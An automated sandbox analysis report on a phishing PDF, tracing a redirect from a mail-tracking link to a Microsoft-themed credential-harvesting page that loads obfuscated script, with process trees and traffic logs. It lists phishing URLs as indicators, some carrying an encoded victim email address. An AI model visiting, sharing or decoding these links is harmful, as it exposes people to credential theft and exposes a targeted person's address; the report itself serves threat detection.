Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Employee_Letter.pdf

Overview

General Information

Sample name:Employee_Letter.pdf
Analysis ID:1571793
MD5:930b6679e7d7a2cab6b10525781297c7
SHA1:f3a6f8c0187c0cf904038db54575a76ca65222be
SHA256:3366ce37dd44cfe463c86e52c3d80eb028c9a082cbc9eb729beb318c13573b5b
Infos:

Detection

HTMLPhisher
Score:72
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

AI detected phishing page
Antivirus detection for URL or domain
Yara detected HtmlPhish78
AI detected landing page (webpage, office document or email)
AI detected suspicious Javascript
Detected suspicious crossdomain redirect
HTML page contains hidden javascript code
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Stores files to the Windows start menu directory

Classification

  • System is w10x64
  • Acrobat.exe (PID: 5460 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\Employee_Letter.pdf" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C)
    • AcroCEF.exe (PID: 1276 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
      • AcroCEF.exe (PID: 7340 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2072 --field-trial-handle=1544,i,8096113706356251709,14712202224613905127,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
  • chrome.exe (PID: 7860 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://go.eu.sparkpostmail1.com/f/a/TeZdKDVSihVahrYyiCrP-Q~~/AAGCxAA~/RgRpNb0OP0QjaHR0cHM6Ly9sb3RhZG1pbi5pbi9kdWUvY2lnYW0vaW5kZXhXBXNwY2V1QgpnRA44U2evTxxnUhJ6YXJnYXJAZmFyaWRlYS5jb21YBAAAAAE~#cm9ubmllLnBhcnRyaWRnZUBjaGVyb2tlZWJyaWNrLmNvbQ== MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 8168 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2076 --field-trial-handle=1920,i,690903513133958984,11826020221324224109,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
dropped/chromecache_192JoeSecurity_HtmlPhish_78Yara detected HtmlPhish_78Joe Security
    dropped/chromecache_182JoeSecurity_HtmlPhish_78Yara detected HtmlPhish_78Joe Security
      SourceRuleDescriptionAuthorStrings
      1.1..script.csvJoeSecurity_HtmlPhish_78Yara detected HtmlPhish_78Joe Security
        No Sigma rule has matched
        No Suricata rule has matched

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Source: https://lotadmin.in/due/cigam/index#cm9ubmllLnBhcnRyaWRnZUBjaGVyb2tlZWJyaWNrLmNvbQ==SlashNext: Label: Credential Stealing type: Phishing & Social Engineering
        Source: https://lotadmin.in/due/cigam/indexAvira URL Cloud: Label: phishing

        Phishing

        barindex
        Source: https://lotadmin.in/due/cigam/index#cm9ubmllLnBhcnRyaWRnZUBjaGVyb2tlZWJyaWNrLmNvbQ==Joe Sandbox AI: Score: 7 Reasons: The brand 'Microsoft' is well-known and typically associated with the domain 'microsoft.com'., The URL 'lotadmin.in' does not match the legitimate domain name for Microsoft., The domain 'lotadmin.in' does not contain any recognizable association with Microsoft., The use of a different domain extension '.in' and an unrelated domain name is suspicious., No subdomain or recognizable Microsoft-related keywords are present in the URL. DOM: 1.0.pages.csv
        Source: Yara matchFile source: 1.1..script.csv, type: HTML
        Source: Yara matchFile source: dropped/chromecache_192, type: DROPPED
        Source: Yara matchFile source: dropped/chromecache_182, type: DROPPED
        Source: https://lotadmin.in/due/cigam/index#cm9ubmllLnBhcnRyaWRnZUBjaGVyb2tlZWJyaWNrLmNvbQ==Joe Sandbox AI: Page contains button: 'Slide to verify' Source: '1.0.pages.csv'
        Source: PDF documentJoe Sandbox AI: PDF document contains QR code
        Source: 0.0.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://lotadmin.in/due/cigam/index#cm9ubmllLnBhcn... High-risk behavior detected: Script uses base64 encoding (obfuscation) and XOR decryption to hide content, followed by document.write() to inject decoded content directly into the DOM. This pattern is commonly used in malware to hide malicious payloads. The use of document.write() is particularly dangerous as it can completely overwrite the page content with potentially malicious HTML/JavaScript.
        Source: 1.1..script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://www.larkus.ao/animal/script.js... High-risk indicators present: Script contains heavily obfuscated code (base64/encoded string) (+3), uses a 'secretkey' variable suggesting potential cryptographic operations (+2), and the length and structure of the encoded content suggests complex operations hidden from view (+2). Additional risk due to suspicious encoding pattern (+1).
        Source: https://lotadmin.in/due/cigam/index#cm9ubmllLnBhcnRyaWRnZUBjaGVyb2tlZWJyaWNrLmNvbQ==HTTP Parser: Base64 decoded: OD'=& 25<SJaYRDQP[~W]xETKEEEOG!?#TKG]xETKEEENGGCXADF^E_NTMBGJaEYSE_G:R(YVJaEYSE_E^PVK^PIJLWK[JDNJU...
        Source: https://lotadmin.in/due/cigam/index#cm9ubmllLnBhcnRyaWRnZUBjaGVyb2tlZWJyaWNrLmNvbQ==HTTP Parser: No favicon
        Source: https://lotadmin.in/due/cigam/index#cm9ubmllLnBhcnRyaWRnZUBjaGVyb2tlZWJyaWNrLmNvbQ==HTTP Parser: No favicon
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeHTTP traffic: Redirect from: go.eu.sparkpostmail1.com to https://lotadmin.in/due/cigam/index
        Source: Joe Sandbox ViewIP Address: 104.26.8.44 104.26.8.44
        Source: Joe Sandbox ViewIP Address: 13.227.8.72 13.227.8.72
        Source: Joe Sandbox ViewIP Address: 104.26.13.205 104.26.13.205
        Source: Joe Sandbox ViewIP Address: 104.26.13.205 104.26.13.205
        Source: Joe Sandbox ViewASN Name: ALABANZA-BALTUS ALABANZA-BALTUS
        Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
        Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
        Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
        Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
        Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
        Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
        Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: global trafficHTTP traffic detected: GET /f/a/TeZdKDVSihVahrYyiCrP-Q~~/AAGCxAA~/RgRpNb0OP0QjaHR0cHM6Ly9sb3RhZG1pbi5pbi9kdWUvY2lnYW0vaW5kZXhXBXNwY2V1QgpnRA44U2evTxxnUhJ6YXJnYXJAZmFyaWRlYS5jb21YBAAAAAE~ HTTP/1.1Host: go.eu.sparkpostmail1.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /due/cigam/index HTTP/1.1Host: lotadmin.inConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /due/cigam/style.css HTTP/1.1Host: lotadmin.inConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://lotadmin.in/due/cigam/indexAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /ajax/libs/font-awesome/6.0.0/css/all.min.css HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://lotadmin.in/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /due/cigam/image/logo.png HTTP/1.1Host: lotadmin.inConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://lotadmin.in/due/cigam/indexAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /animal/script.js HTTP/1.1Host: www.larkus.aoConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://lotadmin.in/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /due/cigam/image/logo.png HTTP/1.1Host: lotadmin.inConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /ajax/libs/font-awesome/6.0.0/webfonts/fa-solid-900.woff2 HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://lotadmin.insec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0/css/all.min.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /?format=json HTTP/1.1Host: api.ipify.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://lotadmin.inSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://lotadmin.in/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /animal/script.js HTTP/1.1Host: www.larkus.aoConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /cherokeebrick.com?size=400 HTTP/1.1Host: logo.clearbit.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://lotadmin.inSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://lotadmin.in/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: lotadmin.inConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://lotadmin.in/due/cigam/indexAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /?format=json HTTP/1.1Host: api.ipify.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /json/ HTTP/1.1Host: ipapi.coConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://lotadmin.inSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://lotadmin.in/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: lotadmin.inConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /cherokeebrick.com?size=400 HTTP/1.1Host: logo.clearbit.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /json/ HTTP/1.1Host: ipapi.coConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficDNS traffic detected: DNS query: go.eu.sparkpostmail1.com
        Source: global trafficDNS traffic detected: DNS query: lotadmin.in
        Source: global trafficDNS traffic detected: DNS query: www.google.com
        Source: global trafficDNS traffic detected: DNS query: x1.i.lencr.org
        Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
        Source: global trafficDNS traffic detected: DNS query: www.larkus.ao
        Source: global trafficDNS traffic detected: DNS query: api.ipify.org
        Source: global trafficDNS traffic detected: DNS query: logo.clearbit.com
        Source: global trafficDNS traffic detected: DNS query: ipapi.co
        Source: 77EC63BDA74BD0D0E0426DC8F80085060.2.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
        Source: 2D85F72862B55C4EADD9E66E06947F3D0.2.drString found in binary or memory: http://x1.i.lencr.org/
        Source: chromecache_190.6.drString found in binary or memory: https://fontawesome.com
        Source: chromecache_190.6.drString found in binary or memory: https://fontawesome.com/license/free
        Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
        Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
        Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
        Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
        Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50008
        Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49870
        Source: unknownNetwork traffic detected: HTTP traffic on port 50008 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49870 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
        Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
        Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
        Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
        Source: classification engineClassification label: mal72.phis.winPDF@29/79@27/13
        Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeFile created: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents-journalJump to behavior
        Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeFile created: C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6 2024-12-09 11-46-56-584.logJump to behavior
        Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
        Source: unknownProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\Employee_Letter.pdf"
        Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
        Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2072 --field-trial-handle=1544,i,8096113706356251709,14712202224613905127,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
        Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://go.eu.sparkpostmail1.com/f/a/TeZdKDVSihVahrYyiCrP-Q~~/AAGCxAA~/RgRpNb0OP0QjaHR0cHM6Ly9sb3RhZG1pbi5pbi9kdWUvY2lnYW0vaW5kZXhXBXNwY2V1QgpnRA44U2evTxxnUhJ6YXJnYXJAZmFyaWRlYS5jb21YBAAAAAE~#cm9ubmllLnBhcnRyaWRnZUBjaGVyb2tlZWJyaWNrLmNvbQ==
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2076 --field-trial-handle=1920,i,690903513133958984,11826020221324224109,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
        Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215Jump to behavior
        Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2072 --field-trial-handle=1544,i,8096113706356251709,14712202224613905127,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8Jump to behavior
        Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
